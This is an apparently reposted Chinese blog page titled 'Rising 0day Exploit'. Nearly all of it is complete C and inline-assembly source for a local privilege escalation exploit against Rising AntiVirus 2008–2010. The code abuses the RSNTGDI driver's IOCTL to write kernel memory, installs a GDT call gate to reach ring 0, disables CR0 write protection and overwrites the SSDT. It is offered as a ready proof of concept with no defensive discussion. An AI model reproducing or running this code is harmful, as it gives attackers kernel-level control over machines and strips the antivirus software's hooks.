首页
    当前位置:
    首页 > 其他 > Rising 0day Exploit

    Rising 0day Exploit

    其他 02-09 642 0

    [tag]rising[/tag]

    来源:
    http://www.milsec.net/viewtopic.php?id=192

    [code]
    restore all ssdt hooks
    // Rising0day.cpp : Defines the entry point for the console application.
    //
    #include "stdafx.h"
    #include "windows.h"
    enum { SystemModuleInformation = 11 };
    typedef struct {
    ULONG Unknown1;
    ULONG Unknown2;
    PVOID Base;
    ULONG Size;
    ULONG Flags;
    USHORT Index;
    USHORT NameLength;
    USHORT LoadCount;
    USHORT PathLength;
    CHAR ImageName[256];
    } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
    typedef struct {
    ULONG Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
    } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
    HANDLE g_RsGdiHandle = 0 ;
    void __stdcall WriteKVM(PVOID Address , ULONG Value)
    {
    ULONG ColorValue = Value ;
    ULONG btr ;
    ULONG ColorBuffer = 0 ;

    DeviceIoControl(g_RsGdiHandle ,
    0x83003C0B,
    &ColorValue ,
    sizeof(ULONG),
    &ColorBuffer ,
    sizeof(ULONG),
    &btr ,
    0
    );
    DeviceIoControl(g_RsGdiHandle ,
    0x83003C0B,
    &ColorValue ,
    sizeof(ULONG),
    Address ,
    sizeof(ULONG),
    &btr ,
    0
    );
    return ;
    }
    void AddCallGate()
    {
    ULONG Gdt_Addr;
    ULONG CallGateData[0x4];
    ULONG Icount;
    __asm
    {
    push edx
    sgdt [esp-2]
    pop edx
    mov Gdt_Addr , edx
    }
    __asm
    {

    push 0xc3
    push Gdt_Addr
    call WriteKVM
    mov eax,Gdt_Addr
    mov word ptr[CallGateData],ax
    shr eax,16
    mov word ptr[CallGateData+6],ax
    mov dword ptr[CallGateData+2],0x0ec0003e8
    mov dword ptr[CallGateData+8],0x0000ffff
    mov dword ptr[CallGateData+12],0x00cf9a00
    xor eax,eax
    LoopWrite:
    mov edi,dword ptr CallGateData[eax]

    push edi
    mov edi,Gdt_Addr
    add edi,0x3e0
    add edi,eax
    push edi
    mov Icount,eax
    call WriteKVM
    mov eax,Icount
    add eax , 0x4
    cmp eax,0x10
    jnz LoopWrite
    }

    return ;
    }

    void IntoR0(PVOID function)
    {
    WORD Callgt[3];
    Callgt[0] = 0;
    Callgt[1] = 0;
    Callgt[2] = 0x3e3;
    __asm
    {
    call fword ptr[Callgt]
    mov eax,esp
    mov esp,[esp+4]
    push eax
    call function
    pop esp
    push offset ring3Ret
    retf
    ring3Ret:
    nop
    }
    return ;

    }
    #pragma pack(1)
    typedef struct _IDTR
    {
    SHORT IDTLimit;
    UINT IDTBase;
    }IDTR,
    *PIDTR,
    **PPIDTR;
    #pragma pack()
    ULONG g_RealSSDT = 0 ;
    ULONG ServiceNum = 0 ;
    ULONG orgService [0x1000] ;
    ULONG RvaToOffset(IMAGE_NT_HEADERS *NT, ULONG Rva)
    {
    ULONG Offset = Rva, Limit;
    IMAGE_SECTION_HEADER *Img;
    WORD i;

    Img = IMAGE_FIRST_SECTION(NT);

    if (Rva < Img->PointerToRawData)
    return Rva;

    for (i = 0; i < NT->FileHeader.NumberOfSections; i++)
    {
    if (Img[i].SizeOfRawData)
    Limit = Img[i].SizeOfRawData;
    else
    Limit = Img[i].Misc.VirtualSize;

    if (Rva >= Img[i].VirtualAddress &&
    Rva < (Img[i].VirtualAddress + Limit)) { if (Img[i].PointerToRawData != 0) { Offset -= Img[i].VirtualAddress; Offset += Img[i].PointerToRawData; } return Offset; } } return 0; } #define ibaseDD *(PDWORD)&ibase DWORD GetHeaders(PCHAR ibase, PIMAGE_FILE_HEADER *pfh, PIMAGE_OPTIONAL_HEADER *poh, PIMAGE_SECTION_HEADER *psh) { PIMAGE_DOS_HEADER mzhead=(PIMAGE_DOS_HEADER)ibase; if ((mzhead->e_magic!=IMAGE_DOS_SIGNATURE)||(ibaseDD[mzhead->e_lfanew]!=IMAGE_NT_SIGNATURE)) return FALSE;
    *pfh=(PIMAGE_FILE_HEADER)&ibase[mzhead->e_lfanew];
    if (((PIMAGE_NT_HEADERS)*pfh)->Signature!=IMAGE_NT_SIGNATURE) return FALSE;
    *pfh=(PIMAGE_FILE_HEADER)((PBYTE)*pfh+sizeof(IMAGE_NT_SIGNATURE));
    *poh=(PIMAGE_OPTIONAL_HEADER)((PBYTE)*pfh+sizeof(IMAGE_FILE_HEADER));
    if ((*poh)->Magic!=IMAGE_NT_OPTIONAL_HDR32_MAGIC) return FALSE;
    *psh=(PIMAGE_SECTION_HEADER)((PBYTE)*poh+sizeof(IMAGE_OPTIONAL_HEADER));
    return TRUE;
    }
    typedef struct {
    WORD offset:12;
    WORD type:4;
    } IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;
    #define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset)))
    DWORD FindKiServiceTable(HMODULE hModule,DWORD dwKSDT , PULONG ImageBase)
    {
    PIMAGE_FILE_HEADER pfh;
    PIMAGE_OPTIONAL_HEADER poh;
    PIMAGE_SECTION_HEADER psh;
    PIMAGE_BASE_RELOCATION pbr;
    PIMAGE_FIXUP_ENTRY pfe;

    DWORD dwFixups=0,i,dwPointerRva,dwPointsToRva,dwKiServiceTable;
    BOOL bFirstChunk;

    GetHeaders((PCHAR)hModule,&pfh,&poh,&psh);

    if ((poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) &&
    (!((pfh->Characteristics)&IMAGE_FILE_RELOCS_STRIPPED))) {

    pbr=(PIMAGE_BASE_RELOCATION)RVATOVA(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress,hModule);
    bFirstChunk=TRUE;
    while (bFirstChunk || pbr->VirtualAddress) {
    bFirstChunk=FALSE;

    pfe=(PIMAGE_FIXUP_ENTRY)((DWORD)pbr+sizeof(IMAGE_BASE_RELOCATION));

    for (i=0;i<(pbr->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))>>1;i++,pfe++) {
    if (pfe->type==IMAGE_REL_BASED_HIGHLOW) {
    dwFixups++;
    dwPointerRva=pbr->VirtualAddress+pfe->offset;
    dwPointsToRva=*(PDWORD)((DWORD)hModule+dwPointerRva)-(DWORD)poh->ImageBase;

    if (dwPointsToRva==dwKSDT)
    {
    if (*(PWORD)((DWORD)hModule+dwPointerRva-2)==0x05c7)
    {
    dwKiServiceTable=*(PDWORD)((DWORD)hModule+dwPointerRva+4)-poh->ImageBase;
    *ImageBase = poh->ImageBase;
    return dwKiServiceTable;
    }
    }

    }
    }
    *(PDWORD)&pbr+=pbr->SizeOfBlock;
    }
    }

    return 0;
    }
    DWORD CR0Reg ;
    ULONG realssdt ;
    void InKerneProc()
    {
    __asm
    {
    cli
    mov eax, cr0
    mov CR0Reg,eax
    and eax,0xFFFEFFFF
    mov cr0, eax
    }
    int i;
    for (i = 0; i < (int)ServiceNum; i++) { *(ULONG*)(*(ULONG*)realssdt + i * sizeof(ULONG)) = orgService[i]; } __asm { mov eax, CR0Reg mov cr0, eax sti } } int main(int argc, char* argv[]) { printf("Rising AntiVirus 2008 ~ 2010 \n" "Local Privilege Escalation Vulnerability Proof Of Concept Exploit\n 2010-1-27\n"); g_RsGdiHandle = CreateFile("\\\\.\\RSNTGDI" , 0, FILE_SHARE_READ | FILE_SHARE_WRITE , 0, OPEN_EXISTING , 0 , 0 ); if (g_RsGdiHandle == INVALID_HANDLE_VALUE) { return 0 ; } SYSTEM_MODULE_INFORMATION ModuleInfo ; // Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and it's base address HMODULE hlib = GetModuleHandle("ntdll.dll"); PVOID pNtQuerySystemInformation = GetProcAddress(hlib , "NtQuerySystemInformation"); ULONG infosize = sizeof(ModuleInfo); __asm { push 0 push infosize lea eax , ModuleInfo push eax push 11 call pNtQuerySystemInformation } HMODULE KernelHandle ; LPCSTR ntosname = (LPCSTR)((ULONG)ModuleInfo.Module[0].ImageName + ModuleInfo.Module[0].PathLength); // Load the kernel image specified KernelHandle = LoadLibrary(ntosname); if (KernelHandle == 0 ) { return 0 ; } ULONG KeSSDT = (ULONG)GetProcAddress(KernelHandle , "KeServiceDescriptorTable"); if (KeSSDT == 0 ) { return 0 ; } ULONG ImageBase = 0 ; ULONG KiSSDT = FindKiServiceTable(KernelHandle , KeSSDT - (ULONG)KernelHandle , &ImageBase); if (KiSSDT == 0 ) { return 0 ; } KiSSDT += (ULONG)KernelHandle; ServiceNum = 0x11c ; ULONG i ; for (i = 0 ; i < ServiceNum ; i ++) { orgService[i] = *(ULONG*)(KiSSDT + i * sizeof(ULONG)) + (ULONG)ModuleInfo.Module[0].Base - ImageBase; } realssdt = KeSSDT - (ULONG)KernelHandle + (ULONG)ModuleInfo.Module[0].Base; SetThreadAffinityMask(GetCurrentThread () , 0 ) ; AddCallGate(); IntoR0(InKerneProc); return 0; } [/code]

    标签:

    Rising 0day Exploit:等您坐沙发呢!

    发表评论

    表情
    还能输入210个字